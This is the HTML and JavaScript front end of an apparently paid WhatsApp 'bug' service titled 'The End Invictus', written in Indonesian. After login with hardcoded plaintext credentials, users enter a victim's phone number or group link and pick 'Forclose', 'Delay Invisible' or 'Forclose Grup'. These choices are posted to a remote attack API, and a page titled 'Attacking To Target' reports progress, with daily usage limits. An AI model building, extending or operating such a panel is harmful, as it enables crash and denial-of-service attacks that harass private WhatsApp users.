<!DOCTYPE html><html lang="id"><head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>The End Invictus</title>
  <style>
    * {
      margin: 0; padding: 0;
      box-sizing: border-box;
      font-family: "Segoe UI", sans-serif;
    }
    body {
      background: radial-gradient(ellipse at center, #000 0%, #111 100%);
      color: white;
      display: flex;
      align-items: center;
      justify-content: center;
      min-height: 100vh;
      flex-direction: column;
    }
    .container {
      background: rgba(30, 30, 30, 0.8);
      border: 1px solid silver;
      box-shadow: 0 0 30px rgba(255,255,255,0.2);
      padding: 20px;
      border-radius: 16px;
      width: 90%;
      max-width: 380px;
      text-align: center;
      position: relative;
    }
    input, button {
      padding: 10px;
      border-radius: 8px;
      width: 100%;
      margin-top: 10px;
    }
    input {
      border: 1px solid silver;
      background: #111;
      color: white;
    }
    button {
      border: none;
      background: linear-gradient(145deg, silver, #ccc);
      cursor: pointer;
      font-weight: bold;
      color: black;
      box-shadow: 0 0 10px #fff;
      transition: 0.2s;
    }
    button:hover {
      box-shadow: 0 0 20px #fff;
      transform: scale(1.03);
    }
    .hidden { display: none; }
    .loading-wrapper {
      width: 100%;
      background: #111;
      border: 1px solid silver;
      border-radius: 8px;
      overflow: hidden;
      margin-top: 15px;
    }
    .progress-bar {
      height: 10px;
      width: 0%;
      background: linear-gradient(to right, white, silver);
      box-shadow: 0 0 10px white;
      transition: width 0.1s linear;
    }
    .warning {
      color: white;
      font-size: 13px;
      background: rgba(255, 255, 255, 0.1);
      padding: 10px;
      border-radius: 8px;
      border: 1px dashed #888;
      margin-top: 15px;
    }
    .btn-mode {
      margin-top: 10px;
      background: #222;
      color: white;
      border: 1px solid silver;
    }
    .btn-mode:hover {
      background: #333;
      box-shadow: 0 0 8px #fff;
    }
    .status-bar {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-top: 25px;
      font-size: 12px;
    }
    .support {
      color: #aaa;
      text-decoration: none;
    }
    .support:hover {
      color: white;
      text-shadow: 0 0 6px #fff;
    }
    .logo-container {
      text-align: center;
      margin-bottom: 20px;
    }
    .logo-container img {
      max-width: 160px;
      border-radius: 50%;
      filter: drop-shadow(0 0 10px white);
    }
    .logo-container h1 {
      font-size: 24px;
      margin-top: 10px;
      color: #fff;
      text-shadow: 0 0 6px #fff, 0 0 10px silver;
    }
#hackerRain {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  z-index: -1;
  background: black;
}
  </style>
</head>
<body>
    <canvas id="hackerRain"></canvas>
<audio id="player" autoplay controls style="display:none"></audio>
<div class="logo-container">
  <img src="https://files.catbox.moe/tgx9xr.jpeg" alt="ZalOfficial">
  <h1>The End Invictus</h1>
  <button onclick="toggleAudio()">🎶 Play & Pause Sound</button>
    <div style="margin-top: 15px;">
  <button onclick="gantiLatar()">🎨 Change Background</button>
</div>
</div>   
  <div class="container" id="loginBox">
    <h2>Log In To Your Account</h2>
    <input type="text" id="username" placeholder="Username" />
    <input type="password" id="password" placeholder="Password" />
    <p id="expiredInfo" style="color:#ff4444; margin-top: 8px;"></p>
    <button onclick="login()">Login</button>
    <div class="status-bar">
      <a class="support" href="https://wa.me/6285809456224">💬 Contact Developer</a>
      <span id="serverStatus">🖥️ Cek Server...</span>
    </div>
  </div>
  <div class="container hidden" id="panelBox">
    <h2 id="welcomeMsg">Selamat Datang!</h2>
    <input type="text" id="nomorTujuan" placeholder="Contoh: 628xxx / Link Grup" />
    <div id="closedNotice" class="warning hidden" style="color:#ff9800;border:1px dashed #ff9800;">
      Server Sedang Maintenance<br>Bisa Akses Pada Jam 09:00 - 00:00 
    </div>
    <div id="bugControls">
      <button class="btn-mode" onclick="kirim('Forclose')">🗑 Forclose Delete</button>
      <button class="btn-mode" onclick="kirim('DelayInvisible')">👻 Delay Invisible</button>
      <button class="btn-mode" onclick="kirim('BugGrup')">🧬 Forclose Grup</button>
      <button class="btn-mode" onclick="bukaFunMenu()">🎮 Fun Menu</button>
    </div>
    <div id="expiredDisplay" style="margin-top: 10px; color: silver; font-size: 12px;"></div>
    <div class="warning">Note : setiap username diberi limit harian agar server tidak down, semua user mendapatkan limit yang sama, gunakan lah akses ini secara bijak dan jangan di salah gunakan!</div>
    <button onclick="logout()" style="margin-top:15px;background:#000;color:white;border:1px solid #555;">Logout</button>
    <div class="status-bar">
      <a href="https://wa.me/6285809456224" class="support">💬 Contact Developer</a>
      <span id="serverStatusPanel">🔍 Checking Server...</span>
    </div>
  </div>
  <div class="container hidden" id="successBox">
    <h2>Attacking To Target</h2>
    <div class="loading-wrapper"><div id="progressBar" class="progress-bar"></div></div>
    <div id="successContent" class="hidden" style="background: rgba(255, 255, 255, 0.05); border: 1px solid silver; padding: 12px; border-radius: 10px; margin-top: 10px; color: white; font-size: 14px; text-align: left;"></div>
    <button onclick="backToPanel()" style="margin-top:15px;">Kembali Ke Type Bug</button>
    <button onclick="logout()" style="margin-top:10px;background:#000;color:white;border:1px solid #555;">Logout</button>
  </div>
  <div class="container hidden" id="funBox">
  <h2>🎮 Fun Menu</h2>
  <button class="btn-mode" onclick="tebakAngka()">🎲 Tebak Angka</button>
  <button class="btn-mode" onclick="randomJoke()">😆 Jokes Receh</button>
  <button class="btn-mode" onclick="quoteHariIni()">📜 Quote Hari Ini</button>
  <button onclick="kembaliKePanel()" style="margin-top:15px;background:#000;color:white;border:1px solid #555;">🔙 Kembali</button>
</div>
  <script>
    const users = {
      "Zal": { pass: "123", expired: "2026-07-22T23:59:59", },
      "Ipan": { pass: "Ipan123", expired: "2025-07-25T23:59:59", },
      "Hanz": { pass: "Hanz123", expired: "2025-08-22T23:59:59", }
    };
    let currentUser = null;
    let serverOnline = false;function toggleAudio() {
  const audio = document.getElementById("player");
  audio.paused ? audio.play() : audio.pause();
}

function login() {
  const user = document.getElementById("username").value;
  const pass = document.getElementById("password").value;
  const info = document.getElementById("expiredInfo");
  const userData = users[user];

  if (userData && userData.pass === pass) {
    const now = new Date();
    const expDate = new Date(userData.expired);
    if (now > expDate) return info.innerText = "❌ Akun sudah expired!";
    currentUser = user;

    document.getElementById("loginBox").classList.add("hidden");
    document.getElementById("panelBox").classList.remove("hidden");
    document.getElementById("welcomeMsg").innerText = `Selamat Datang ${user}!`;
    document.getElementById("expiredDisplay").innerText = `Expired Akun ${user} : ${userData.expired.split("T")[0]}`;
    
  } else {
    info.innerText = "❌ Username atau Password salah!";
  }
}     

function logout() {
  currentUser = null;
  document.getElementById("loginBox").classList.remove("hidden");
  document.getElementById("panelBox").classList.add("hidden");
  document.getElementById("successBox").classList.add("hidden");
  document.getElementById("username").value = "";
  document.getElementById("password").value = "";
}

function backToPanel() {
  document.getElementById("successBox").classList.add("hidden");
  document.getElementById("panelBox").classList.remove("hidden");
}

function isJamAktif() {
  const hour = new Date().getHours();
  return hour >= 9 && hour < 24;
}
function updateJamStatus() {
  const open = isJamAktif();
  document.getElementById("closedNotice").classList.toggle("hidden", open);
  document.getElementById("bugControls").style.display = open ? "block" : "none";
}
function checkServerStatus() {
  fetch("http://zaloffc.yubii.my.id:3000/api/ping")
    .then(res => {
      serverOnline = res.ok;
      const statusText = res.ok ? "Status Server : Online 🟢" : "Status Server : Offline 🔴";
      const statusColor = res.ok ? "#00e676" : "#ff4444";      
      document.getElementById("serverStatus").innerText = statusText;
      document.getElementById("serverStatus").style.color = statusColor;
      document.getElementById("serverStatusPanel").innerText = statusText;
      document.getElementById("serverStatusPanel").style.color = statusColor;
      document.getElementById("bugControls").style.display = res.ok ? "block" : "none";
      const notice = document.getElementById("closedNotice");
      if (!res.ok) {
        notice.classList.remove("hidden");
        notice.innerHTML = "Server Sedang Offline<br>Silakan Kembali Nanti.";
      } else {
        updateJamStatus();
      }
    })
    .catch(() => {
      serverOnline = false;
      document.getElementById("serverStatus").innerText = "Status Server : Offline 🔴";
      document.getElementById("serverStatus").style.color = "#ff4444";
      document.getElementById("serverStatusPanel").innerText = "Status Server : Offline 🔴";
      document.getElementById("serverStatusPanel").style.color = "#ff4444";
      document.getElementById("bugControls").style.display = "none";
      const notice = document.getElementById("closedNotice");
      notice.classList.remove("hidden");
      notice.innerHTML = "Server Sedang Offline<br>Silakan Kembali Nanti.";
    });
}
function kirim(mode) {
  const target = document.getElementById("nomorTujuan").value.trim();
  if (!target || !serverOnline || !isJamAktif()) return;
  fetch(`http://zaloffc.yubii.my.id:3000/api/limit?user=${currentUser}`)
    .then(res => res.json())
    .then(data => {
      if (!data.allowed) {
        // tampilkan tampilan limit habis
        document.getElementById("panelBox").classList.add("hidden");
        document.getElementById("successBox").classList.remove("hidden");

        const result = document.getElementById("successContent");
        const now = new Date().toLocaleString("id-ID");
        result.innerHTML = `
<div style="color:#ffffff;">
  <b>📊 Status :</b> Gagal<br>
  <b>📅 Tanggal :</b> ${now}<br>
  <b>📥 Pengirim :</b> ${currentUser}<br>
  <b>📝 Keterangan :</b> Anda telah Mencapai Batas Limit Bug<br>`;
result.classList.remove("hidden");
return;
      }
      document.getElementById("panelBox").classList.add("hidden");
      document.getElementById("successBox").classList.remove("hidden");
      const progress = document.getElementById("progressBar");
      const result = document.getElementById("successContent");
      result.classList.add("hidden");
      let percent = 0;
      const interval = setInterval(() => {
        percent += 1;
        progress.style.width = percent + "%";
        if (percent >= 100) {
          clearInterval(interval);

          fetch("http://zaloffc.yubii.my.id:3000/api/bug", {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({ target, mode, user: currentUser })
          })
            .then(res => res.json())
.then(data => {
  const now = new Date().toLocaleString("id-ID");
  result.innerHTML = `
<b>📊 Status :</b> ${data.status === "success" ? "Sukses" : "Gagal"}<br> 
<b>🎯 Target :</b> ${data.target}<br> 
<b>📅 Tanggal :</b> ${now}<br> 
<b>📥 Pengirim :</b> ${data.user}<br>
<b>📊 Limit :</b> ${data.count}/${data.max}<br>`;
  result.classList.remove("hidden");
});
        }
      }, 30);
    })
    .catch(() => {
      alert("❌ Gagal mengecek limit.");
    });
}
  
setInterval(updateJamStatus, 60000);
setInterval(checkServerStatus, 30000);
updateJamStatus();
checkServerStatus();

function cekIdGrup() {
  const link = document.getElementById("linkGrup").value.trim();
  const hasil = document.getElementById("hasilIdGrup");
  if (!link || !link.includes("chat.whatsapp.com")) {
    hasil.innerText = "❌ Link tidak valid";
    return;
  }
  hasil.innerText = "⏳ Memproses...";
  fetch("http://zaloffc.yubii.my.id:3000/api/link2id", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ link })
  })
    .then(res => res.json())
    .then(data => {
      if (data.jid) {
        hasil.innerText = `✅ ID Grup: ${data.jid}`;
      } else {
        hasil.innerText = data.error || "❌ Gagal mengambil ID";
      }
    })
    .catch(() => {
      hasil.innerText = "❌ Terjadi kesalahan saat mengambil ID grup.";
    });
}

const playlist = [
  "https://files.catbox.moe/6019hy.mp3",
  "https://files.catbox.moe/e5iukb.mp4",
  "https://files.catbox.moe/tw7vdb.mpeg"
];

let currentTrack = 0;
const audio = document.getElementById("player");

// Fungsi untuk memutar lagu berdasarkan indeks sekarang
function playCurrentTrack() {
  audio.src = playlist[currentTrack];
  audio.load();
  audio
    .play()
    .catch(err => {
      console.warn("🔇 Autoplay gagal, menunggu interaksi user:", err);
    });
}

// Tombol play/pause manual
function toggleAudio() {
  if (audio.muted) audio.muted = false;
  if (audio.paused) {
    audio.play().catch(err => {
      console.warn("Gagal play:", err);
    });
  } else {
    audio.pause();
  }
}

// Ganti ke lagu berikutnya
function nextTrack() {
  currentTrack = (currentTrack + 1) % playlist.length;
  playCurrentTrack();
}

// Saat lagu selesai, lanjut ke lagu berikutnya
audio.addEventListener("ended", nextTrack);

// Jalankan setelah halaman siap
window.addEventListener("DOMContentLoaded", () => {
  // Pastikan autoplay dipicu oleh user
  setTimeout(() => {
    playCurrentTrack();
  }, 500); // Delay agar elemen audio siap
});
  
  const canvas = document.getElementById("hackerRain");
  const ctx = canvas.getContext("2d");

  canvas.width = window.innerWidth;
  canvas.height = window.innerHeight;

  const chars = "01";
  const fontSize = 14;
  const columns = canvas.width / fontSize;
  const drops = Array.from({ length: columns }).fill(1);

  function draw() {
    ctx.fillStyle = "rgba(0, 0, 0, 0.05)";
    ctx.fillRect(0, 0, canvas.width, canvas.height);

    ctx.fillStyle = hackerColor;
    ctx.font = fontSize + "px monospace";

    for (let i = 0; i < drops.length; i++) {
      const text = chars[Math.floor(Math.random() * chars.length)];
      ctx.fillText(text, i * fontSize, drops[i] * fontSize);

      if (drops[i] * fontSize > canvas.height || Math.random() > 0.95) {
        drops[i] = 0;
      }

      drops[i]++;
    }
  }

  setInterval(draw, 33);

  window.addEventListener("resize", () => {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  });
  
const latarList = ["hacker", "hitam", "putih", "hackerMerah"];
let latarIndex = 0;

function gantiLatar() {
  latarIndex = (latarIndex + 1) % latarList.length;
  setLatar(latarList[latarIndex]);
}

function setLatar(mode) {
  const canvas = document.getElementById("hackerRain");
  
  if (mode === "hacker") {
    canvas.style.display = "block";
    document.body.style.background = "black";
    document.body.style.color = "white";
    hackerColor = "#fff";
      } else if (mode === "hackerMerah") {
    canvas.style.display = "block";
    document.body.style.background = "black";
    document.body.style.color = "white";
    hackerColor = "red";
  } else if (mode === "hitam") {
    canvas.style.display = "none";
    document.body.style.background = "radial-gradient(ellipse at center, #000 0%, #111 100%)";
    document.body.style.color = "white";
  } else if (mode === "putih") {
    canvas.style.display = "none";
    document.body.style.background = "radial-gradient(ellipse at center, #fff 0%, #ccc 100%)";
    document.body.style.color = "black";
  }
}
function bukaFunMenu() {
  document.getElementById("panelBox").classList.add("hidden");
  document.getElementById("funBox").classList.remove("hidden");
}

function kembaliKePanel() {
  document.getElementById("funBox").classList.add("hidden");
  document.getElementById("panelBox").classList.remove("hidden");
}

function tebakAngka() {
  const jawaban = Math.floor(Math.random() * 10) + 1;
  const tebakan = prompt("🎯 Tebak angka dari 1 - 10:");
  if (parseInt(tebakan) === jawaban) {
    alert("🎉 Keren! Kamu benar!");
  } else {
    alert(`😅 Salah! Jawabannya adalah ${jawaban}`);
  }
}

function randomJoke() {
  const jokes = [
    "Kenapa ayam nyebrang jalan? Karena mau ke sisi lain 😆",
    "Apa beda kamu sama kalender? Kalender ada tanggal merah, kamu cuma bikin deg-degan ❤️",
    "Kenapa laptop suka error? Karena dia juga butuh healing 😩"
  ];
  alert(jokes[Math.floor(Math.random() * jokes.length)]);
}

function quoteHariIni() {
  const quotes = [
    "🔥 Gagal itu biasa, bangkit itu luar biasa.",
    "💡 Semangat itu bukan nunggu mood, tapi dibikin.",
    "🧠 Kode bagus lahir dari banyak error."
  ];
  alert(quotes[Math.floor(Math.random() * quotes.length)]);
}
</script>
</body>
</html>